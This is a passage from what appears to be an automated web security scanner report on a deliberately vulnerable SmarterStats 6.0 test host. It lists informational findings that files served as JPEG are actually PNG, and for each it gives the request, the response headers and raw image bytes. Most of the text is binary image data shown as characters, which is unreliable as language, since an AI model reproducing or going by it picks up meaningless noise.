..@T....[...|,}..D.D....[..#....{\.?.../.=@.|.0..1.cEK...k..@T..U....{2......yr`x./~.........YRK3.q........"..e.....#"...Vk..].g.."D Z)..7.&..I...a..}.X..".,j.d.}..\1B..>... ............]...b..J..@.|._.....r......Q..........-r.?......Yk.g...[n|...6.2........K...kV?......?..4.Hs..'.....A....]...2u.u.Y....{w..6..{.....y.....j..e..g}{.....@T[<.Y.cY@..X`s..Y.f..bE)..d.Y..$.f.X?..d..Y@ Z.-.....g......F,.......n..H..<..D......7w%..Oc_.6.J......=..n...7a:'".UX..X......a?.#{?n....o.c. ...R.6EM.."3.F).....Ms...J..G..u.....Y...f.w..+..5...Rk.`FC...n..
.....=....m.3%"...=.....{...LE;...X.WIz JM.     ...=....]..@...c...LU3...\%..#.......-.Q....}...LE;...X.'X.K..U.[.M.\m..Pr|...<..d.v.]...7...Muh8..=...n.%.c.(&....Y...v    s.n&.[.D..T_..,0....$..G..,.i......K...&Y@ .d6.H...<- .M.f.8[?.;~.d.....u;t..........._o)....F....>.dL_............@....z.......H..DS.....9N.N...1..../..^..V..E..$...8.........k..Rw......O.....
a...........M'}3....M0d.....D&..~..wt...k......W.H]ERWp..S...u....n4.....?8[.....J..0..].D.L....bh..H9}..%.o..`R_.../.....EJ.....1..^ ..+.[....n.....v..ZgO....,...HD4...|.O.A .`..@t........`..=.Dm.&.3..;../...2.GW    ....M.(90..l.....S.2..1..f.....    V,s....p.K..(.!.R:..[..F-]Jx....P...)Z ..<E$~zK..7p...xK.h...O.!x...........cD..v....FD...l...e....,;...du..."............o....,.".\...u..    ..."F[}....s.l.;u..{']1*...W.u>.R......+....7...?..<..>d.Y`....Y...e.Y........., ....@4.|.., .xX@ ......d.Y...f.O?..d....D.VT...,0....,.....,.a......C...fY@ .e>.X...<, .yXQ}....,..D...........".+..Y@..e...o.Q..S.@....IEND.B`.

10.55. http://vulnerable.smarterstats.6.0.host:9999/Temp/e7ea3804b059410d9c7faf6f178d6ae9.jpg  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /Temp/e7ea3804b059410d9c7faf6f178d6ae9.jpg

Issue detail

The response contains the following Content-type statement:The response states that it contains a JPEG image. However, it actually appears to contain a PNG image.

Request

GET /Temp/e7ea3804b059410d9c7faf6f178d6ae9.jpg HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Proxy-Connection: keep-alive
Referer: http://vulnerable.smarterstats.6.0.host:9999/Client/frmViewOverviewReport.aspx?reportID=OVERVIEW_Workspace
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.63 Safari/534.3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; SelectedLanguage=; STTTState=

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Sun, 10 Oct 2010 03:32:08 GMT
X-AspNet-Version: 4.0.30319
Cache-Control: public
ETag: W/"1CB682BB7662C00"
Content-Type: image/jpeg
Content-Length: 8761
Connection: Close

.PNG
.
...IHDR...".........L.......sRGB.........gAMA......a....    pHYs..........o.d..!.IDATx^.].......bcc...1`.ec..\.[.s.f...........c..7....a!.+$..]qH..V+.....0...?.....W35.3.=..S]....Q......*...#........A.`..V...... .(!"1.A@.(..!...@.....!"..A@.(..!...@.....!"..A@.(..!...@.....!"..A@.(..!...@...............F....Zf.....M.6.l}8.^......A...JAD.0........jp....;. -_S~....^...TA@. .JAD.-.%.    U....$_ .h.e...w..A@.(.....".C>:..t.bH..p.DMGW...&...W../.ellL}...R.....6..._...\D...".A*.n...s.Hw..".A.(...(........!...(...!.n....f....m.,I>.qBD.(......!.,D..U.H.c.[.D.FD..E..iL..t......Q.+..{.N...BD}l.{.~.5k....i......."]6.i.$.n.....MZM!:u.:...Y...g.........BD.`(..S........y;u..1+..>C.....q.-&X...<.....YMBD..L.(D..Qg..RM.|.BD..$D..Qg!"6..IBD..L.(D..Qg.D...>S..pBj.C@.f}`."b......:D.}.....u......!"!"...-..S...O"z...."r.8...@.WG.N...>..._.B-.m7..HD$...P..
..C..'.-=.4.x.}X.#D$D.2...Bt..u.ID........2.!"!"...-..S...o"z...X.#D$D.2...Bt..u.ID.1."r.92X..Df.!:u.:."..|...1{...X. ..DD,C.[(D..Qg_D..|.....Od.......P..
..C....}:9..h..3X.#D$D.2...Bt..u.ED....D.v.<....    ...%o...:D.}...O=..h...Y.#D$D.2...Bt..u.ED..Y..h...Y.#D$D.2...Bt..u.ED...Tw.........{.(.....C....!.....j.UW..@""..X...P.N.....h..+.....6\y%.t....X...P.N......    ..P............U...!.....?.H.......q..DD.....e......3..\.vS.sp....`..#2.G.8",".8.U..:.4.u..
.j..}.$...c0.....rj    ..C..WDt.N;...:Jm..rN..q..6.p..O...=.-!".9.
..C....a........5C$3\......h7...V.c....$c.....>.\I.N...>..$...... ...;U.......^M..I.....60..[zU.....6^{-..T.......h.'......t.X._......u......u.^...uEB.)3.....)...f.....#2.u2~...BI)D..Qg.D45:.#...^.6_=..J..M..S..)...X..<...T..g3..Y...d..eCN.Bt..u.AD&.~..k.f...\. "...2..z3R.r7..!".N..Bt..u.ADHxED.....o..e....M.....</!.<...;D..Qg.D......]wU[..Nm..oXF.(...m`!!..!dW..S....".......h...Y6 D..&!".9.
..C............4u....X.!D$D.2...Bt..u.AD.....5.}....LG.H..e(y....!............4k......#]..1....S...."ZD.....k".~.-,...H""...-..S....".....y?C..o...Y.#D$D.2...Bt..u............NP3......Y.#D$D.2...Bt..u...L......D..id.........!..7....5t...m....Ho|...H""...-..S..s.D......}8...+...........!..7......q.6........&!D........!..7....ABBD..C.....jBt..u....y...wT3.i>.......2F..$!".9.
..C.9o"ZFI..v.E.\v..BD..C.....*Bt..u....y.w....    .l.....2k68P.j...C.9o"B..}{....6.(.$.~p...hp..5...!..7.=L+..R...K..e.o.2.YG$...P..
..C.9o"B.....$D..a$"r.f..Bt..u........=.0....u.&;4..DBD.c..!D..Q......_9.H!"..s...8(..    ..C.9O"2    .+.>Zm.."].....;.....rk...C.9O".....3{...C'":&h.}p"@.>|..s.....vwq....'Xwbh2..i..-.k.....f.].Y3...S^.D.bj....F.GKG.m..\"".9.
..C.9....5..Yg.i:...._..e.%!".    u.%.......>..hh...0.o.{.#..X6.D(D..Q.<..d.o...P...r.....QR...R7.P_NQ...w.....>.......@l ...../j..;.i......_..P.$"J ".J.....h...l    'I^""...&.bt...yFD+h...v....>........._...D...%.....%7...:D..$"$......F..Y.......4...z#"
...f....k.n............:D..$.'.=W.G..s...Z..}..:..d........s##Xw...^.._M...*...7.*Y...rCf.^.9.|/.5...h.!:u.:...........Q7..7)=s..%......N.....C.Q..?.U>.5k..E.i.h.)n..?.q.$!"78rj    ..C.9......~..".(28.......3,.....v    ..C.9/"2    ...~..|.y.....q..........s&..F9e....K.N...y..Ix}.... ..........^.8..k...C....9.n.!.6.&....NR.h.....].j..#".3....._....!.......u..Z..u'...M...a.x.....yu...!.......I...t.9....kY..1"2[vD.R....wJ.<K......5@.N...y..NxE.k......hnE>I.&D$D...!.6::..;.Q..>..l.....e..Xu./$D..    Ct..u.+".    ....6.k.)[...eD........un....dB "....).._...ZH.nc...%{.....5v.O..a.h.,.g..,.....%.?_}U.z......$.u.k$.>...j..gv..|#".]..@D..h.S^...........@NH.C.T.K.._k..m.....D..5.....q.|..h..g....9F...N.....>..r........>....6\Hx}...{|e...X.f.#.......t}7b....5A.Ho.....{......8........X......X.(...DDg4.+/...h..e..P..Nq.k.2. X7.k%....=.2s..,|%".....6....;..0XW.K.._+...?.....UG.%D...i":.........(...8G..._.`...$..M....2s......(-"b...4V...+o...z.B..y..Y.`.....MP..3.Uh...^.....}Oa.Q..8......X...#.G..'3._.j.7...Q.    ..... ..a...(z].8.?;...X#....BD9...h..SXe=.8........9../X7.^v..zM]..l..2V..,".!..9jIg.E...s..D...(..+L...9../X7.....%..q....w..Q.i. ..v..,.9.5".t/..f.:":.dvy..Cu.........'.s..^.n`..&t...^.|e......$....zOp....^...z.!.,{.....%..O<Q....E].......X/..O.....\ "c<.....VC]....SS...D"...)..d..u..u.s.C^.n`.<..~..X?.r.%..)IDT."....'..bCB.}.....m[.^."I......a.q..........5...S.e.V..a........|.]#.\.`..3{.r...dNDD..5FO...G..s.i...c.M.....m... ..+......`..3...8?.r....)u...F7.p.R......^.....{..F,+.=...:*.../X..RH..%......yfk...9DD|#....._<.$.h..gl.j...D.....8.?...v..:..4.O...#...M....!...mI.....o...}_............$?..D...4..|..8........`_...m.).u#...q%..4.c\.1"F.y. D.F3    ........u##X+...........Tl-...;.s............`......vK..../d5.DD}`.....=....g.L..e.N...F....g...."r`j...=6s.k&.....s8hxf.....M<....>2=>.M..R".DDY....z!m..m.|]......j ...Y:.5.G....#".D&...........BD...Y.`....K....#..\.BS"...h@"z.9{..=...dP!q.A..._u..yf.P.....n.%uDD+F.-.w.U-...>.......<.U....""ZIc.I>2=o..a..."".D....E.ao....;G..F..:....i.^K    .BD9Z."..tz...4..F.as.<#..;G...Su..6.......>.Y"..M.%......"..vp.k_..;.......Xc.-.s........%5..y..2F.S.M.h.oM'..........]E.....Iyf.|d......1..1..G..\..i..'........ffX.....sp0r%Su...T.<.~.....Xp...@D..^.iO,x.Q..
uqU.9\`....X#.c    ..    .q-&....Q..gYC3jH.....nZ..#cSg...X.f.R.Y?..|..,l%"J..r&"4.2Z..1#l25.Uu...?....52....`!"... ...C...QF...b.c..#C3g...X#e    .......l:.......DD>H..X~...a.FGY.$Te.....7W.kL..^_...~>"D....o...m........s8hr.*...YU.&-G.....>...DDi..G"zl..........x.BU....^GI.BD..*.*..Q.....y.. ..U.9r6..........}..R}c.Yg......D.q..)....p.u..+.=.D..}].|..:.-.Ue...Y......4u?B.fi..9@Dtv......1....#...'<B..BO.e..;..).$.Ue...Y............1.76.y&...GDt..p].....1....q,...A ..$.4....,...1.Fd]i]e.`Y.C.*c.-b..1.4....tT.....R7..........Q.....]2S..v......5.<...."....f.m....i1c..O.~:......T.j...1^.h'z..N.|...R0>.X...w.q.*.Y..P..X....hr%.76.q.....Q...h....u...l...."!.........,kw,TU....;..(.76.NDz6.5M.......`.}3Q..)5..m.3X..E(..3..F......:.c.aUWU......9~.1....B..}..@8..[.....r..]V.9Q .,.....,.p,TU.q..........U..
.k.y..z.5v.y..2.....Zf...4..^..Z..:.5P.n.*.8....wg...&"...cV6:0..*4...\@....O.^Uu.[.\.W.k.u?J.L8~...SYP........&".N.(..:..b.YZ...ASg...X.d..4|........V...LE....=.mO...s.,=..*b...0l...9."......D...(k.    ...6V.9<.C.c.....W......Ol<.dV.HD....@B......1CasU.9l.q)[E.1P.0...D...R.BD.>._Tyh.].rzl.*:.>.e..5...-...{.}b...8.DD).QQ$......6..U.98F..L....6..*.............%]TY.......z.U5.....\...>YXQm..BD.,.h"B...q.&...spq.C....D^..&.......|0..d...d.Oy.BD.7.]...h[."..:f...q..F..?/....[........M..>LYR...Eo....h.....N:.e22F.6FT0.=MK.m.`....Rr.
Q.<u..f.>....?h.3........s,t..7.n.,z...7i.@.(gg..^GD.......{[%.f12...>.D....8=Hg.?b. ..DN...^Y..2.;.ht[_.:.D.....DD....Y&.$....P?...,%g....CgCB.S..m.g{/7..Y32..Ul.F....<J..l}aR.(S.u....=.C..^J..n.okd.......v..!..........=H....a.......D...J]D[_.dFn...ED.....i:-.;Ndkd.F..|.z.....`.oS.....{.....n.Q.7u...1.....x....e*..h...YOdkd.`rRE.z..y.-........p..i.*..O''...Fot.0h.(.......<.x.n...ED.......]Odcd,..$....t~.O.d.0u.l..v.H..m7Mi..YM....~.."r.@...Qc...G....3.#s...*B.{P..P.$.....66.\.a...F.'.=W..e.o.q..lD"...h...e(/6.-..12..x..To.....V....<......sfy.At6$....j_#.K..O.M..z.S.........c.eA+D....m.'J...kd,.H.B.6fRV.q.z....Go..l7p..:.. fl.....
....DF.    ......lH..........t>..9.Wo..a@...UO!"N.......fY.r/-p.#e[.........m....7.r..o,..CL..ZM-..2.>x>.IF....v....
...Q.{..!.R..^..zHm[....XY[......OIE$............>b......p.s.]......<`).;....9...DDi..Cc..Aq..f.l..7'j=.b.6.........3.^.F/.\.fR..m.7..%...".+........R.^+....g..X.bZ.t;}E.=w.9.M...u....}.....~=.`A@.R.~<..4z....>D.R....i...)../...ST.W_........ iD..I...0....'............ .....o.h.u.Z.P......Q.Y'...'.#"8[.
.....S.0....,.f.....G.....r".w`..8.$....GI_......Q.qv..g..U".{..9..'...V'.?t[A..{....A...6.o.p...    ....^h'....L..md.^.:A/...1.....w$UGs..-.{t4d..q.BDq..q.,N.m...@Ze$.q2 CF......A....N.]VQ.2.Q.......!.DU.....o..;...dW..Z.....i.m.61.....2.M.(.}^..........w.t......7...\.,D.C........t..- .    j.2.w..^%#z.....UU'..(..C...C.....?.....M.=@...]@..
...}..}4..].1........Q..x...\...Q..LQ...u.q."bDD*.........!.]...{...b..m.........,]3..%....x..w.:.6..w..f.c.zB....V.^.:8..Qg....!.\V..ED.
6.....(,...@..(.v....9.....n^y9A .....h'.R..............@."D.t...h.    .H5Jt.uo............~..F2.UL......x]i:..k.    ....b.k...7...o..<.E....0..tK..y.
...;b,f....n.>..D.....ERC.2..S.........~sMD.9q-
.....%.).R......4AW.....I....."...S.#..1,...W..Dd..p.hD..-...j...+.l.:.O....d.u.^.FD.z....V..k<..E.E...j.:...n....W..GD1..2.]."2o.........5Y....=...&j....S"....H...j.:.f...F.vW2.k.7""B.a........>5"*H..{...(..:VZ...EI%......t..I..H.;..9... ..-J....<...B....u.X.&).v.9@D...F.Dr.1...Vdl...%"..E.............7.(jx.#...C...e..D...J..o.....v.~Qi.o^..#y.?..z."....Q*    5.....i.h..0...............z.E..Muu.;...Z.E.8.9..q.............8V.7..=..o*U..Y.t.P..Y..R.k3..9.t..D.];:}........t.I.J.K%.....4#"j.......:..6..c.ic..w...y...Q...... P......
.. Pq...*n....@..."*C+...@...".......e@@.... :...G@.... ./....!.2... .T..!...... P......
.. Pq...*n....@..."*C+...@...".......e@...w..A=.......IEND.B`.

10.56. http://vulnerable.smarterstats.6.0.host:9999/Temp/f0463b7c1a16472f90db2c0647d531bf.jpg  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /Temp/f0463b7c1a16472f90db2c0647d531bf.jpg

Issue detail

The response contains the following Content-type statement:The response states that it contains a JPEG image. However, it actually appears to contain a PNG image.

Request

GET /Temp/f0463b7c1a16472f90db2c0647d531bf.jpg HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Proxy-Connection: keep-alive
Referer: http://vulnerable.smarterstats.6.0.host:9999/Client/frmViewOverviewReport.aspx?reportID=OVERVIEW_Workspace
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.63 Safari/534.3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; STHashCookie={"CountsGuid":"1647212677","TopBarSection":"AdminManage"}; SelectedLanguage=; STTTState=

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Sun, 10 Oct 2010 03:37:44 GMT
X-AspNet-Version: 4.0.30319
Cache-Control: public
ETag: W/"1CB682C7F131D80"
Content-Type: image/jpeg
Content-Length: 6349
Connection: Close

.PNG
.
...IHDR...".........L.......sRGB.........gAMA......a....    pHYs..........o.d...bIDATx^....,...q.9..#.9.8g..........0>.....06.s.\\p..s...#..zzF...n...:.W....H...Z.^R+\e.C.....Y..F...S.*@..A.F@....
.D...>............+@...
..T.
.Dl.T.
...A4.+..P.*@..P.*0........@....@.-.f.9.....j.m]l[.X,M.u6.*@..Q`Z ..f..S....1%...X....biR...?K..T.*0!..@Sl. r.M..5.x..I...@...x
L.D{p..Ad...$;...M...~ggg...+..|.A........@B.x..G..6..n..../.32.B...r.8.....W..#{.9t.Q..L.D..r50.......D.N5...^.e.u..f. .5...U.p>7.U.`u.&...=w.D......{zm..\.M.D.......8...r.........Qz3$..5.vgRK......z..-..g.......t.....k..(.f3...._.&=J.... ..R=A...#.I.#...!s.D...D...D...VC..;.A...AD..D2...".d...-G.R..t.H..Ss.!"..O.2CX.VU.)7vI..T.).. :.:.."s.'.i.l..)7vI..T.).E..$oufy....[... :4.);o.;M....""..Y... ".R!..... Z.......AD..D...yg.5{...D8#..".+1"....w> ......".H.J..F.9....7.h..A.q%.H..A...AD.i\. ..7k.}.B.g..A.q%.H...At.M... ".4.D.i..5.n. ..AD.i\. ..7k..`A.3.. ...A.Q. ... ".4.D.i..5..k!.3.. ...A.Qo. ..w...AD.i\. ..7k.}...g..A.q%.H...A.-."..D.....".zs..}.B@#..".+.D..f..-.pF..D.W".4...D+."..D.....".zs....B@#..".+.D..f.oZ... ".4.4k..oVf.*m]l.:l.u..P.X...M.g.1.... ..AD.]L..o.j]..?.\...x.m..^mLy.}p.N..4..}....l@t.....AD.]L..j}n6..D..iFG...O.4....'....$,O/.......5..).UW..M.&.EN.2>.~biR...D_......1"J..N.I........Dc......H.2.Wd...Q|.j..S.3.m.mR.yM.Dew.E>..u.].
D.%...4BIY,'].)k6    .U.    #"...,....}.`.:H.....s.........5.u3...g.. ..f....8P.'x...k...J...gJ.{...V...c.F..D=\6.D..IDD.Jo.b.Y_.._....Na*I#L/%O...kI..r]. ...n.P.i4>nI...<v@..=...o....*..f=}.../C...#".?I...Q8n....Ti..Z..+?.4.Y. J.}    j..A....@T....Q}.YS.q..A.#."..A.E."..D....F.Q8P.[..&....a.f....U.......(..e!.4.. ..%.)G......W...X..,../X... ".4.9.....]1....Ey5..k!..8.>oA.3.. ...v......x..h..L$..D.. .Y.Dw}....D....G.....\+.
&.j*5f^=.n. .Y.D.. ..AD.i.n4.......i*4v^5.......3.h..p..8o..(CZ..<"...5....o.Z.D...1@cD.L.-.DmcD..^S.=.....w..;.>..O[... ".4~(..2"j...vX.....y. ..G......S.D8#.."...."..F....
..W.".y..l.(....1@#.."......<.......^^=.p.....    .e.B:...1.@..!.. ]3..O1..D.c....q.}.FD8cD.L.-.D..!.5..Qd'.)..... .........Z."..D...]%.SFD........V;.LS.q..A.<}...J.-....L.wH..Z...J..[.. .Q...!..>    .;>n....-.x..Q{DT..H....QGD..c............".H....)#"....Q.    !_.. ..(h. ....".h. .<....AT..W......Qc.F..D...)".<....A.?......?>.5.. .xfF.U...    ....rO"n..........>lA.3.. .    .4.9.....x..;@1
..[... ".4^.1".<.|..Ad....gq.}...g..A.... ..d....Mx5.2.7.....B. ".f...1.O...@_.".Yc...hD.7."..D...@.<.~.}....\.u...8..6..
.K.z.)..D.#~.qAq.}...g..A4_..........F.Q...v]>...>.V-].X...-..A.;........-.pF..D3.Q:..+{...T3:jFE.4....#...........B@#.....(.R...NV2X<...q...XT,M..a@.;........,.pF..D3..@_.j.)...........q]....H.yg........|._._....r$.0...,A.T.......I...K5....dwJG4"..=.....#".Wg.G.y...-...j.#;?...^.b..x..;.. Z& \.$....9...e.....p.H.N..u...|}.....}..8A._..'k.S:. z...p..h..#.R..#..(.>....A....m....m.2.h..A..,    ........2..1...p.....    .e.B..I.....eH....7...(..>..^Q.........2..`.q... ..t..8..aA.3.. .DBU.    .....y.)..;...@.....D8#......c.k.._..y~    ".>..^Q...m... ".f.".#O;...Y...=4..r."..".g..5;.g....V...}..
6......g..A43....kU[!.;k...3?zZ."...n+.(....c.F..D3.Q.h......|.2..j..wMt;0.A.f."..D...e|...f.<...._..-=4..+..D.]....q.]cA.3.. .... *..h...3..?..V.z..vMt;0.D...4.H.....eH...G$y...Q...Y...,
..o2.h...    <.h>..=..D...Rzh\~#..".H.....#.pK..q...t.^..D.....g... .8......<K.rr.1R.,..,.O.v*...L$..D.=..~Cq...FD8cD..H....)#...}...*..W"..An..(...zc.F..D....D.Yc..c[.jj7B^=......,...Y... ".4.6.........z<.ZS....A....m.A.-...q.T..."..i].]3.c.'..D..9.6.q...FD8cD.L..D.aO.I. ..*.C....F..D....O.....a..9.......nE.[]...."....+q*...('G...f...=|.28.l@j..W....Q...5.....#"    L.<..    #........
.....nE.[]....-.pF..D.O..D.^..&..D...nu=A.L@H.3...."..i]...A...r...Q}9.....-.x..Q.........j...(.b..D...AD.I"....4.9..z.....d...._aA.3.. .x.$..v.4.9......,..F..D./].....z...fd]l[...I...|.\....F#......g..At.AT.M...6?)2E .&.z........-j...e.D8#....
.*...Or.M..5wb...^.....v.... ..K...AD.]P.U.>".K.Y5....i.&.z..ggg~g..\WbC..k>./../.......#k+K.-.d.....D.....p..[....^lA.3FD..RA.._.`...f.e.n    G.D.....AD..D..`u.?v.RmP:H.z}...?...@...E.D8#..".(..n0.:..0p}.9..)..S..?.g.......B. "..8..W[..,.a.cD...n.t4"......AD.i<k.cD}.o?..Cc.p..p....H.-...V....-U..eH.2..f....^...'..    .q.=.FD8cD.L..D..b...A..d.&,FAt.y... ".4N%..#....A..h.|\. ....".. .(.....pn..'...~.\c.F..D.WbD.Q.%..D..=n.P.D.. ..AD.i\. ..7..~m.... Z& ._.R.....eH..1.!...s{.<.8..m#".1"Z&.."    V'.G.5.~Rw... .<....D....$.cD4dD..k.....P#..".H..8.:".d.f.-...D.W.......Yr......I.~G.5.._..W.8..a#".1"bD.q'    ..5..k..@v..Q...tc.F..D..F.p^uD..@v....2.!...6wI..Z...........i6"..#.e.. .`u.y.........<.j..A.q?    .........`t.kv.S...AD..D...y...p..F.A.d."..D......i.k....n.....D...t..R...!L.N..T.H>5.n.c7@....O2.h....<.....j.......#....1.8..hA....P..C.Ww....U\...m. ..D.q.7.....,.p......).......>...m. ..D....zEA........0.a....M)o....u..P.....AA......A4...\....o...A....N....F).......3.h....5.!RI...>.}.....n...........D8...S..].c.....5P.....!A..R\....p.r@...    ".I..}.z5.r.....m.6.........u................ ..(...}....y.@.-.z.1.^..).ks.Ej.e.D    .GC. ...._....@......\4.FA......hx@. z..b]@w.mM..._Z]..s.........*....<......Q.svvf...].|.\.t.F............:"2-
..DD)o"G99.puf9)o..6.n9.........C.=$kU..r....Wm....w.s....i..P 2...s.Y....5)...T U...".N...T1..
P.....D2...
P.!. ..T....T....Q/...
P.!. ..T....T....Q/....7......(#../{...F......$,....nr.....k..S.D.......F.7u`e:a.....Q.2..4p]XN..&....p"#A4...=c.y...."&...(w.Au.(G..N,..R.M..r..... .H..m..H\TT..P.\....8.._..e.a..........R....... .H....e$.....'.r.Q.a..^p..W...h..k.C..A4........L    .^]&m.}..,..E..6iu.Q...B.(nu....z../Cq..=..V....q}.,g.D(....-G;..]....m...Y.e...`u5.b.....we.(c.T.......T.6./.Sk.h.!....~T.
$+@.%K..T.
.. ....~T.
$+@.%K..T.
.. ...v./.1[8..u.Z.#wm...*.u#@].l...,.r....lt]..t....RV(.~jeT.......&..jv.+v..s.......N..uv........o..h9..o..+._?|.s.......s.3....,..Sk....ng.2...e#.....].s.t{i..c..".T....r.W..4...F.a.}..~.E..RF......<VF.:*...J...K..u.Z..k..T....8F.O...T.....+.].....a.M.n].&eri
Xk......u...(..D.}.K.4.Q..PI:../.\u/..I@T... ..6.b.`..P.S
'.i...w._g.V...o_..VB....}...,...q...k.RLq....f0.TX.n.....T.[..C,..........t].^]....]y}.
.]....3"...*Mm..0.T.O.....).V.@D.;#......d..~.D
.......w    k.:.J....    .u..we...MK@....N.~....NLL...o.hv7F.
...<#..A..dQ.>..{.f...._5.X}.......m.jg.n@.!.......)@..dc&*@..
.DH5y/*@.D
.D"...
P.....RM..
P.....H6f..T...A.T....T@..A$......@*@.!.......)@..dc&*@..
.DH5y/*@.D
.D"...
P.....RM..
P.....J.!%..6d....IEND.B`.

10.57. http://vulnerable.smarterstats.6.0.host:9999/Temp/f0b1d954de574491a98b97217656a58a.jpg  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /Temp/f0b1d954de574491a98b97217656a58a.jpg

Issue detail

The response contains the following Content-type statement:The response states that it contains a JPEG image. However, it actually appears to contain a PNG image.

Request

GET /Temp/f0b1d954de574491a98b97217656a58a.jpg HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Proxy-Connection: keep-alive
Referer: http://vulnerable.smarterstats.6.0.host:9999/Client/frmViewOverviewReport.aspx?reportID=OVERVIEW_Workspace
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.63 Safari/534.3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; SelectedLanguage=; STTTState=

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Sun, 10 Oct 2010 03:32:12 GMT
X-AspNet-Version: 4.0.30319
Cache-Control: public
ETag: W/"1CB682BB92FEF80"
Content-Type: image/jpeg
Content-Length: 6349
Connection: Close

.PNG
.
...IHDR...".........L.......sRGB.........gAMA......a....    pHYs..........o.d...bIDATx^....,...q.9..#.9.8g..........0>.....06.s.\\p..s...#..zzF...n...:.W....H...Z.^R+\e.C.....Y..F...S.*@..A.F@....
.D...>............+@...
..T.
.Dl.T.
...A4.+..P.*@..P.*0........@....@.-.f.9.....j.m]l[.X,M.u6.*@..Q`Z ..f..S....1%...X....biR...?K..T.*0!..@Sl. r.M..5.x..I...@...x
L.D{p..Ad...$;...M...~ggg...+..|.A........@B.x..G..6..n..../.32.B...r.8.....W..#{.9t.Q..L.D..r50.......D.N5...^.e.u..f. .5...U.p>7.U.`u.&...=w.D......{zm..\.M.D.......8...r.........Qz3$..5.vgRK......z..-..g.......t.....k..(.f3...._.&=J.... ..R=A...#.I.#...!s.D...D...D...VC..;.A...AD..D2...".d...-G.R..t.H..Ss.!"..O.2CX.VU.)7vI..T.).. :.:.."s.'.i.l..)7vI..T.).E..$oufy....[... :4.);o.;M....""..Y... ".R!..... Z.......AD..D...yg.5{...D8#..".+1"....w> ......".H.J..F.9....7.h..A.q%.H..A...AD.i\. ..7k.}.B.g..A.q%.H...At.M... ".4.D.i..5.n. ..AD.i\. ..7k..`A.3.. ...A.Q. ... ".4.D.i..5..k!.3.. ...A.Qo. ..w...AD.i\. ..7k.}...g..A.q%.H...A.-."..D.....".zs..}.B@#..".+.D..f..-.pF..D.W".4...D+."..D.....".zs....B@#..".+.D..f.oZ... ".4.4k..oVf.*m]l.:l.u..P.X...M.g.1.... ..AD.]L..o.j]..?.\...x.m..^mLy.}p.N..4..}....l@t.....AD.]L..j}n6..D..iFG...O.4....'....$,O/.......5..).UW..M.&.EN.2>.~biR...D_......1"J..N.I........Dc......H.2.Wd...Q|.j..S.3.m.mR.yM.Dew.E>..u.].
D.%...4BIY,'].)k6    .U.    #"...,....}.`.:H.....s.........5.u3...g.. ..f....8P.'x...k...J...gJ.{...V...c.F..D=\6.D..IDD.Jo.b.Y_.._....Na*I#L/%O...kI..r]. ...n.P.i4>nI...<v@..=...o....*..f=}.../C...#".?I...Q8n....Ti..Z..+?.4.Y. J.}    j..A....@T....Q}.YS.q..A.#."..A.E."..D....F.Q8P.[..&....a.f....U.......(..e!.4.. ..%.)G......W...X..,../X... ".4.9.....]1....Ey5..k!..8.>oA.3.. ...v......x..h..L$..D.. .Y.Dw}....D....G.....\+.
&.j*5f^=.n. .Y.D.. ..AD.i.n4.......i*4v^5.......3.h..p..8o..(CZ..<"...5....o.Z.D...1@cD.L.-.DmcD..^S.=.....w..;.>..O[... ".4~(..2"j...vX.....y. ..G......S.D8#.."...."..F....
..W.".y..l.(....1@#.."......<.......^^=.p.....    .e.B:...1.@..!.. ]3..O1..D.c....q.}.FD8cD.L.-.D..!.5..Qd'.)..... .........Z."..D...]%.SFD........V;.LS.q..A.<}...J.-....L.wH..Z...J..[.. .Q...!..>    .;>n....-.x..Q{DT..H....QGD..c............".H....)#"....Q.    !_.. ..(h. ....".h. .<....AT..W......Qc.F..D...)".<....A.?......?>.5.. .xfF.U...    ....rO"n..........>lA.3.. .    .4.9.....x..;@1
..[... ".4^.1".<.|..Ad....gq.}...g..A.... ..d....Mx5.2.7.....B. ".f...1.O...@_.".Yc...hD.7."..D...@.<.~.}....\.u...8..6..
.K.z.)..D.#~.qAq.}...g..A4_..........F.Q...v]>...>.V-].X...-..A.;........-.pF..D3.Q:..+{...T3:jFE.4....#...........B@#.....(.R...NV2X<...q...XT,M..a@.;........,.pF..D3..@_.j.)...........q]....H.yg........|._._....r$.0...,A.T.......I...K5....dwJG4"..=.....#".Wg.G.y...-...j.#;?...^.b..x..;.. Z& \.$....9...e.....p.H.N..u...|}.....}..8A._..'k.S:. z...p..h..#.R..#..(.>....A....m....m.2.h..A..,    ........2..1...p.....    .e.B..I.....eH....7...(..>..^Q.........2..`.q... ..t..8..aA.3.. .DBU.    .....y.)..;...@.....D8#......c.k.._..y~    ".>..^Q...m... ".f.".#O;...Y...=4..r."..".g..5;.g....V...}..
